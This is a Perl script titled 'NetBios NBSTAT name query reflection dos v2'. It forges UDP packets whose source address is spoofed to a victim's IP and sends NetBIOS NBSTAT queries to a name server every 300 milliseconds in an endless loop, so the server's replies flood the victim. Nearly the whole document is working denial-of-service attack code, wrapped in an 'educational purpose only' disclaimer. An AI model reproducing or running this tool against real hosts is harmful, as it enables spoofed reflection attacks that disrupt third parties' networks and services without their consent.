NetBios NBSTAT name query reflection dos v2

1. #!/usr/bin/perl
2. #
3. #  NetBios NBSTAT name query reflection dos
4. #
5. #  Copyright 2015 (c) Todor Donev
6. #  todor.donev@gmail.com
7. #  http://www.ethical-hacker.org/
8. #  https://www.facebook.com/ethicalhackerorg
9. #
10. #  Disclaimer:
11. #  This or previous program is for Educational
12. #  purpose ONLY. Do not use it without permission.
13. #  The usual disclaimer applies, especially the
14. #  fact that Todor Donev is not liable for any
15. #  damages caused by direct or indirect use of the
16. #  information or functionality provided by these
17. #  programs. The author or any Internet provider
18. #  bears NO responsibility for content or misuse
19. #  of these programs or any derivatives thereof.
20. #  By using these programs you accept the fact
21. #  that any damage (dataloss, system crash,
22. #  system compromise, etc.) caused by the use
23. #  of these programs is not Todor Donev's
24. #  responsibility.
25. #
26. #  Use at your own risk and educational
27. #  purpose ONLY!
28. #
29. #  See also, UDP-based Amplification Attacks:
30. #  https://www.us-cert.gov/ncas/alerts/TA14-017A
31. #  http://www.rhyshaden.com/netbios.htm
32. #
33.  
34. use strict;
35. use Socket;
36. use warnings;
37. no warnings 'uninitialized';
38.  
39. if ( $< != 0 ) {
40.    print "Sorry, must be run as root!\n";
41.    print "This script use RAW Socket.\n";
42.    exit;
43. }
44.  
45. my $nbns            = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
46. my $victim          = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)
47.  
48. print "[ NetBios NBSTAT name query reflection ddos\n";
49. if (!defined $nbns || !defined $victim) {
50.     print "[ Usg: $0 <nbns src> <victim>\n";
51.     print "[ <todor.donev\@gmail.com> Todor Donev\n";
52.     exit;
53. }
54. print "[ Sending NBNS packets: $ARGV[0] -> $ARGV[1]\n";
55. socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
56. setsockopt(RAW, 0, 1, 1) or die $!;
57. main();
58.  
59.     # Main program
60. sub main {
61.     my $packet;
62.    
63.     $packet = iphdr();
64.     $packet .= udphdr();
65.     $packet .= nbnshdr();
66.     # b000000m...
67.     send_packet($packet);
68. }
69.  
70.     # IP header (Layer 3)
71. sub iphdr {
72.     my $ip_ver          = 4;                    # IP Version 4          (4 bits)
73.     my $iphdr_len       = 5;                    # IP Header Length      (4 bits)
74.     my $ip_tos          = 0;                    # Differentiated Services   (8 bits)
75.     my $ip_total_len    = $iphdr_len + 20;          # IP Header Length + Data   (16 bits)
76.     my $ip_frag_id      = 0;                    # Identification Field      (16 bits)
77.     my $ip_frag_flag    = 000;                  # IP Frag Flags (R DF MF)   (3 bits)
78.     my $ip_frag_offset  = 0000000000000;            # IP Fragment Offset        (13 bits)
79.     my $ip_ttl          = 255;                  # IP TTL            (8 bits)
80.     my $ip_proto        = 17;                   # IP Protocol           (8 bits)
81.     my $ip_checksum     = 0;                    # IP Checksum           (16 bits)
82.  
83.     # IP Packet
84.     my $iphdr   = pack(
85.             'H2 H2 n n B16 h2 c n a4 a4',
86.             $ip_ver . $iphdr_len, $ip_tos,
87.             $ip_total_len, $ip_frag_id,
88.             $ip_frag_flag . $ip_frag_offset,
89.             $ip_ttl, $ip_proto, $ip_checksum,
90.             $victim, $nbns
91.             );
92.             return $iphdr;
93. }
94.  
95.     # UDP Header (Layer 4)
96. sub udphdr {
97.     my $udp_src_port    = 31337;            # UDP Sort Port     (16 bits) (0-65535)
98.     my $udp_dst_port    = 137;              # UDP Dest Port     (16 btis) (0-65535)
99.     my $udp_len     = 8 + length(nbnshdr());    # UDP Length        (16 bits) (0-65535)
100.     my $udp_checksum    = 0;                # UDP Checksum      (16 bits) (XOR of header)
101.  
102.     # UDP Packet
103.     my $udphdr      = pack(
104.             'n n n n',
105.             $udp_src_port,
106.             $udp_dst_port,
107.             $udp_len,
108.             $udp_checksum
109.             );
110.     return $udphdr;
111. }
112.  
113.     # NetBios Name Service
114. sub nbnshdr {
115.  
116.     my $transid      = 0x03e8;
117.     my $namequery    = 0x0010;
118.     my $questions    = 0x0001;
119.     my $answerrr     = 0x0000;    
120.     my $authrr       = 0x0000;
121.     my $adrr         = 0x0000;
122.    
123.     my $query        = "\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41";
124.        $query       .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
125.        $query       .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00";
126.        
127.     my $type        = 0x0021;    
128.     my $class       = 0x0001;
129.  
130.     # NetBios packet
131.     my $nbnshdr     = pack(
132.                         'n n n n n n a* n n',
133.              $transid,
134.                          $namequery,
135.              $questions,
136.              $answerrr,
137.                          $authrr,
138.                          $adrr,
139.                          $query,
140.                          $type,
141.                          $class
142.             );
143. return $nbnshdr;
144. }
145.  
146. sub send_packet {
147.     while(1){
148.     select(undef, undef, undef, 0.30);          # Sleep 300 milliseconds
149.     send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $nbns)) or die $!;
150.    }
151. }